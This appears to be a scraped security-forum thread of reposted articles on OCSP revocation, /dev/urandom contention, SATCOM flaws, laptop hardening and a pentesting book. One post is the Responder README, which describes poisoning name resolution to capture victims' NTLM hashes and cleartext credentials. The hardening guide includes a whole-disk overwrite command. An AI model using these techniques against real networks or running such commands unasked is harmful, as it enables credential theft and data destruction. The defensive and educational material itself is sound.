  17. [h=3]No, don't enable revocation checking (19 Apr 2014)[/h] Revocation checking is in the news again because of a large number of revocations resulting from precautionary rotations for servers affected by the OpenSSL heartbeat bug. However, revocation checking is a complex topic and there's a fair amount of misinformation around. In short, it doesn't work and you are no more secure by switching it on. But let's quickly catch up on the background: Certificates bind a public key and an identity (commonly a DNS name) together. Because of the way the incentives work out, they are typically issued for a period of several years. But events occur and sometimes the binding between public key and name that the certificate asserts becomes invalid during that time. In the recent cases, people who ran a server that was affected by the heartbeat bug are worried that their private key might have been obtained by someone else and so they want to invalidate the old binding, and bind to a new public key. However, the old certificates are still valid and so someone who had obtained that private key could still use them. Revocation is the process of invalidating a certificate before its expiry date. All certificates include a statement that essentially says “please phone the following number to check that this certificate has not been revoked”. The term online revocation checking refers to the process of making that phone call. It's not actually a phone call, of course, rather browsers and other clients can use a protocol called OCSP to check the status of a certificate. OCSP supplies a signed statement that says that the certificate is still valid (or not) and, critically, the OCSP statement itself is valid for a much shorter period of time, typically a few days. The critical question is what to do in the event that you can't get an answer about a certificate's revocation status. If you reject certificates when you can't get an answer, that's called hard-fail. If you accept certificates when you can't get an answer that's called soft-fail. Everyone does soft-fail for a number of reasons on top of the general principle that single points of failure should be avoided. Firstly, the Internet is a noisy place and sometimes you can't get through to OCSP servers for some reason. If you fail in those cases then the level of random errors increases. Also, captive portals (e.g. hotel WiFi networks where you have to “login” before you can use the Internet) frequently use HTTPS (and thus require certificates) but don't allow you to access OCSP servers. Lastly, if everyone did hard-fail then taking down an OCSP service would be sufficient to take down lots of Internet sites. That would mean that DDoS attackers would turn their attention to them, greatly increasing the costs of running them and it's unclear whether the CAs (who pay those costs) could afford it. (And the disruption is likely to be significant while they figure that out.) So soft-fail is the only viable answer but it has a problem: it's completely useless. But that's not immediately obvious so we have to consider a few cases: If you're worried about an attacker using a revoked certificate then the attacker first must be able to intercept your traffic to the site in question. (If they can't even intercept the traffic then you didn't need any authentication to protect it from them in the first place.) Most of the time, such an attacker is near you. For example, they might be running a fake WiFi access point, or maybe they're at an ISP. In these cases the important fact is that the attacker can intercept all your traffic, including OCSP traffic. Thus they can block OCSP lookups and soft-fail behaviour means that a revoked certificate will be accepted. The next class of attacker might be a state-level attacker. For example, Syria trying to intercept Facebook connections. These attackers might not be physically close, but they can still intercept all your traffic because they control the cables going into and out of a country. Thus, the same reasoning applies. We're left with cases where the attacker can only intercept traffic between a user and a website, but not between the user and the OCSP service. The attacker could be close to the website's servers and thus able to intercept all traffic to that site, but not anything else. More likely, the attacker might be able to perform a DNS hijacking: they persuade a DNS registrar to change the mapping between a domain (example.com) and its IP address(es) and thus direct the site's traffic to themselves. In these cases, soft-fail still doesn't work, although the reasoning is more complex: Firstly, the attacker can use OCSP stapling to include the OCSP response with the revoked certificate. Because OCSP responses are generally valid for some number of days, they can store one from before the certificate was revoked and use it for as long as it's valid for. DNS hijackings are generally noticed and corrected faster than the OCSP response will expire. (On top of that, you need to worry about browser cache poisoning, but I'm not going to get into that.) Secondly, and more fundamentally, when issuing certificates a CA validates ownership of a domain by sending an email, or looking for a specially formed page on the site. If the attacker is controlling the site, they can get new certificates issued. The original owners might revoke the certificates that they know about, but it doesn't matter because the attacker is using different ones. The true owners could try contacting CAs, convincing them that they are the true owners and get other certificates revoked, but if the attacker still has control of the site, they can hop from CA to CA getting certificates. (And they will have the full OCSP validity period to use after each revocation.) That circus could go on for weeks and weeks. That's why I claim that online revocation checking is useless - because it doesn't stop attacks. Turning it on does nothing but slow things down. You can tell when something is security theater because you need some absurdly specific situation in order for it to be useful. So, for a couple of years now, Chrome hasn't done these useless checks by default in most cases. Rather, we have tried a different mechanism. We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do. A powerful attacker may be able to block a user from receiving CRLSet updates if they can intercept all of that user's traffic for long periods of time. But that's a pretty fundamental limit; we can only respond to any Chrome issue, including security bugs, by pushing updates. The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened. Perhaps we need to consider a system that can handle much larger numbers of revocations, but the data in that case is likely to be two orders of magnitude larger and it's very unlikely that the current CRLSet design is still optimal when the goal moves that far. It's also a lot of data for every user to be downloading and perhaps efforts would be better spent elsewhere. It's still the case that an attacker that can intercept traffic can easily perform an SSL Stripping attack on most sites; they hardly need to fight revoked certificates. In order to end on a positive note, I'll mention a case where online revocation checking does work, and another, possible way to solve the revocation problem for browsers. The arguments above started with the point that an attacker using a revoked certificate first needs to be able to intercept traffic between the victim and the site. That's true for browsers, but it's not true for code-signing. In the case where you're checking the signature on a program or document that could be distributed via, say, email, then soft-fail is still valuable. That's because it increases the costs on the attacker substantially: they need to go from being able to email you to needing to be able to intercept OCSP checks. In these cases, online revocation checking makes sense. If we want a scalable solution to the revocation problem then it's probably going to come in the form of short-lived certificates or something like OCSP Must Staple. Recall that the original problem stems from the fact that certificates are valid for years. If they were only valid for days then revocation would take care of itself. (This is the approach taken by DNSSEC.) For complex reasons, it might be easier to deploy that by having certificates that are valid for years, but include a marker in them that indicates that an OCSP response must be provided along with the certificate. The OCSP response is then only valid for a few days and the effect is the same (although less efficient). Sursa: https://www.imperialviolet.org/2014/04/19/revchecking.html
  18. Linux /dev/urandom and concurrency Recently I was surprised to find out that a process that I expected to to complete in about 8 hours was still running after 20. Everything appeared to be operating normally. The load on the server was what we expected, IO was minimal, and the external services it was using were responding with latencies that were normal. After tracing one of the sub-processes we noticed that reads from /dev/urandom were not what we expected. It was taking 80-200ms to read 4k from this device. At first I thought that this was an issue with entropy but /dev/urandom is non-blocking so that probably wasn't the issue. I didn't think that 80-200ms was typical so I tried a dd on the system in question and another similar system in production. The system in question took about 3 minutes to write 10Mb while the reference system took about 3s. The only difference between the systems with respect to /dev/urandom was the rate and number of processes reading from the device. The reads were on the order of hundreds per second. The number of processes reading from /dev/urandom made me wonder if maybe there was a spinlock in the kernel in the read code. After looking at the code I found one. You can see the spinlock here in the Linux kernel source code. The author mentions the potential for contention in a thread on the mailing list from December 2004. Fast forward 10 years and contention on this device is a real issue. Our application uses curl from within PHP to fetch data from a cache. The application has to process 10s of millions of text objects and we don't want to wait days for that processing to complete so we split the work of processing each object over N threads. The read from /dev/urandom appears to be coming from ares_init which is being called from curl_easy_init in our version of PHP+curl. Removing the AsynchDNS feature from curl causes the problem to go away (tracing confirms that the read from /dev/urandom is no longer there). You can remove this feature by compiling with --disable-ares. So why is this an issue? I wrote a python script to measure the read times from /dev/urandom as you increase the contention by adding more threads. Here is a plot with the results. Running the same script with a user-land file is more or less linear out to 16 threads. A simple spinlock can have a big impact in the multi-core world of 2014! Sursa: Linux /dev/urandom and concurrency
  19. [h=3]A Wake-up Call for SATCOM Security[/h] By Ruben Santamarta @reversemode During the last few months we have witnessed a series of events that will probably be seen as a tipping point in the public’s opinion about the importance of, and need for, security. The revelations of Edward Snowden have served to confirm some theories and shed light on surveillance technologies that were long restricted. We live in a world where an ever-increasing stream of digital data is flowing between continents. It is clear that those who control communications traffic have an upper-hand. Satellite Communications (SATCOM) plays a vital role in the global telecommunications system. Sectors that commonly rely on satellite networks include: Aerospace Maritime Military and governments Emergency services Industrial (oil rigs, gas, electricity) Media It is important to mention that certain international safety regulations for ships such as GMDSS or aircraft's ACARS rely on satellite communication links. In fact, we recently read how, thanks to the SATCOM equipment on board Malaysian Airlines MH370, Inmarsat engineers were able to determine the approximate position of where the plane crashed. IOActive is committed to improving overall security. The only way to do so is to analyze the security posture of the entire supply chain, from the silicon level to the upper layers of software. Thus, in the last quarter of 2013 I decided to research into a series of devices that, although widely deployed, had not received the attention they actually deserve. The goal was to provide an initial evaluation of the security posture of the most widely deployed Inmarsat and Iridium SATCOM terminals. In previous blog posts I've explained the common approach when researching complex devices that are not physically accessible. In these terms, this research is not much different than the previous research: in most cases the analysis was performed by reverse engineering the firmware statically. What about the results? Insecure and undocumented protocols, backdoors, hard-coded credentials...mainly design flaws that allow remote attackers to fully compromise the affected devices using multiple attack vectors. Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be affected by these vulnerabilities. I hope this research is seen as a wake-up call for both the vendors and users of the current generation of SATCOM technology. We will be releasing full technical details in several months, at Las Vegas, so stay tuned. The following white paper comprehensively explains all the aspects of this research http://www.ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf Sursa: IOActive Labs Research: A Wake-up Call for SATCOM Security
  20. NBT-NS/LLMNR Responder Laurent Gaffie lgaffie@trustwave.com http://www.spiderlabs.com INTRODUCTION This tool is first an LLMNR, NBT-NS and MDNS responder, it will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option to "On" via command line if you want this tool to answer to the Workstation Service request name suffix. FEATURES Built-in SMB Auth server. Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set to On. This functionality is enabled by default when the tool is launched. Built-in MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r to On(NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008. Built-in HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r to On for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim. Built-in HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need to set the -r option to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2, and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari. The folder Cert/ was added and contain 2 default keys, including a dummy private key. This is intentional, the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair. Built-in LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r to On for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin. Built-in FTP Auth server. This module will collect FTP clear text credentials. Built-in small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing. All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format: (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt The file will be located in the current folder. Responder will logs all its activity to a file Responder-Session.log. When the option -f is set to "On", Responder will fingerprint every host who issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode. Browser Listener finds the PDC in stealth mode. Icmp Redirect for MITM on Windows XP/2003 and earlier Domain members. This attack combined with the DNS module is pretty effective. WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is higly effective. You can now send your custom Pac script to a victim and inject HTML into the server's responses. See Responder.conf. This module is now enabled by default. Analyze mode: This module allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning any requests. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet. Responder is now using a configuration file. See Responder.conf. Built-in POP3 auth server. This module will collect POP3 plaintext credentials Built-in SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials. Download: https://github.com/SpiderLabs/Responder/
  21. Paranoid security lockdown of laptop What I want to achieve is: Minimize damage done if laptop is stolen Minimize damage done if laptop is tampered with while away from it Minimize chance of being compromised while system is running Maximize chance of detection if system is compromised Maximize anonymity on the internet Security is a tradeoff between usability and risk. This document is for those willing to sacrifice some usability. I suspect the contents of this text will become increasingly more valuable as time goes on. Full disk encryption Disk encryption ensures that files are always stored on disk in an encrypted form. The files only become available to the operating system and applications in readable form while the system is running and unlocked by a trusted user. An unauthorized person looking at the disk contents directly, will only find garbled random-looking data instead of the actual files. For example, this can prevent unauthorized viewing of the data when the computer or hard-disk is: located in a place to which non-trusted people might gain access while you're away lost or stolen, as with laptops, netbooks or external storage devices in the repair shop discarded after its end-of-life In addition, disk encryption can also be used to add some security against unauthorized attempts to tamper with your operating system - for example, the installation of keyloggers or Trojan horses by attackers who can gain physical access to the system while you're away. Preparation Fill drive with random data to prevent recovery of previously stored data. It also prevents detection of usage patterns on drive. dd if=/dev/random of=/dev/sda bs=1M Full disk encryption using dmcrypt + LUKS cryptsetup --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000 --use-random --verify-passphrase luksFormat /dev/sda2 cryptsetup luksOpen /dev/sda2 root mkfs.ext4 /dev/mapper/root mount /dev/mapper/root /mnt mkdir /mnt/boot mount /dev/sda1 /mnt/boot Edit /etc/mkinitcpio.conf and add encrypt and shutdown hook to HOOKS. Place the encrypt hook directly before filesystem hook. And dm_mod and ext4 to MODULES. Edit /etc/default/grub and add GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:root" Swap space No. Instead buy enough RAM. BIOS Set a BIOS password. This prevents cold boot attacks where RAM is immediately dumped after a reboot. It has been shown that data in RAM persists for a few seconds after downpowering. USB attacks When a USB device is inserted, the USB driver in kernel is invoked. If a bug is discovered here it may lead to code running: system("killall gnome-screensaver") Or it may slurp up all the memory and cause the linux out-of-memory-killer to kill the screensaver process. USB driver load can be disabled in BIOS. Or you can: echo 'install usb-storage : ' >> /etc/modprobe.conf USB automounting attacks You lesser beings willing to allow the USB driver to load should atleast disable automounting. Allowing filesystems to automount causes even more potentially vulnerable code to run. E.g. Ubuntu once opened the file explorer and showed thumbnails of images. One researcher was able to find a bug in one image library used to produce thumbnail. He just inserted USB drive and the exploit killed the screensaver. Screensaver Set a screensaver with password lock to kick in after one minute. Create keyboard shortcut to lock screen and manually lock when temporarily leaving system. Power down for longer absences. File integrity To detect compromised files, file integrity tools can store hashsums of them and let you know if they suddenly change. Obviously, malware can also modify the hashsums. But it helps in cases where malware do not. For the extra cautious, you could store the file integrity hashsums offline or print them out. AIDE (Advanced intrusion detection environment) aide -i mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz aide -C rkhunter Rootkit Hunter additionally scans system for rootkits. On a clean system update the system properties rkhunter --propupd rkhunter --check --rwo -sk There probably are a few false positives. Edit the /etc/rkhunter.conf.local and add exceptions for them. Here is my crontab for these two programs: MAILTO=me@dvikan.no MAILFROM=me@dvikan.no 30 06 * * 1 /usr/bin/rkhunter --cronjob --rwo 35 06 * * 1 /usr/bin/aide -C Network VPN Use a trusted VPN to make ISP unable to see your traffic. www.ipredator.se To prevent traffic from accidentially flowing via real physical network interface, you should only allow outgoing traffic to be UDP on port 1194. Also for DNS and DHCP, port 53, 67, and 68 outgoing must be allowed. Simple stateful firewall Drop everything in INPUT. Then allow already existing connections. Also allow all to loopback interface. iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT ACCEPT iptables -A INPUT -i lo -j ACCEPT iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 53 -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 1194 -j ACCEPT iptables -A OUTPUT -o tun0 -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 67:68 -j ACCEPT Save rules into file and have it loaded on boot; iptables-save > /etc/iptables/iptables.rules systemctl enable iptables If your VPN does not support ipv6, then drop all outgoing traffic on ipv6: ip6tables -P OUTPUT DROP And add ipv6.disable=1 to kernel line to prevent loading of ipv6 module. DNS Do not use ISPs DNS server. Unless you want them to see the domains you are visiting. https://www.ipredator.se/page/services#service_dns Put this in /etc/resolv.conf nameserver 194.132.32.32 nameserver 46.246.46.246 Preserve DNS settings by adding the following to /etc/dhcpcd.conf nohook resolv.conf MAC address To randomize MAC address and keep vendor prefix: macchanger -e interface After boot, set a random MAC address. Here is an example systemd service which you put in /etc/systemd/system/macchanger@.service. [unit] Description=Macchanger service for %I Documentation=man:macchanger(1) [service] ExecStart=/usr/bin/macchanger -e %I Type=oneshot [install] WantedBy=multi-user.target Then to enable it: systemctl enable macchanger@enp2s0 Firefox Sandbox Sandfox runs programs within sandboxes which limit the programs access to only the files you specify. Why run Firefox and other programs in a sandbox? In the Firefox example, there are many components running: java, javascript, flash, and third-party plugins. All of these can open vulnerabilities due to bugs and malicious code; under certain circumstances these components can run anything on your computer and can access, modify, and delete your files. It's nice to know that when such vulnerabilities are exploited, these components can only see and access a limited subset of your files. Create a sandbox with sandfox: sudo sandfox firefox Do not install flash or java. Disable webrtc to prevent local IP discovery For registration forms use a pseudorandom identity and throwaway email address. Make firefox prefer cipher suites providing forward secrecy. Extentions noscript https everywhere Email Many SMTP and IMAP servers use TLS. Not all do. Email is decrypted at each node. End-to-end encryption makes email secure. The most widely used standard for encrypting files is the OpenPGP standard. GnuPG is a free implementation of it. A short usage summary is: gpg --gen-key # generate keypair gpg --detach-sign --armour file.txt # signature gpg -r 7A2B13CD --armour --sign --encrypt file.txt # signature and encryption TLS gotchas If not all HTTP content is served over TLS, an attacker could inject javascript code which extracts your password. Or simply sniff the session cookie before or after. The bridge between plaintext and TLS in HTTP is a weak point. The HTTP HSTS header mitigates this particular threat. If not a ciphersuite with perfect forward security is used, then an attacker can at later point use the server's private key to decrypt historically captured traffic. Other stuff Do not allow other users to read your files chmod 700 $HOME Some people tend to use the recursive option (-R) indiscriminately which modifies all child folders and files, but this is not necessary, and may yield other undesirable results. The parent directory alone is sufficient for preventing unauthorized access to anything below the parent. Put tape over webcam. Other decent resources Surveillance Self-Defense Written 2014-04-19 by dag Sursa: https://dvikan.no/paranoid-security-lockdown-of-laptop
  22. [h=2]The Hacker Playbook: Practical Guide To Penetration Testing[/h] Download Password: Hacking Articles,How to Hack,Hacking Tricks,Penetration Testing Tutorials, Metaspolit Tutorial Sursa: Hacking Articles|Raj Chandel's Blog: The Hacker Playbook: Practical Guide To Penetration Testing
×
×
  • Create New...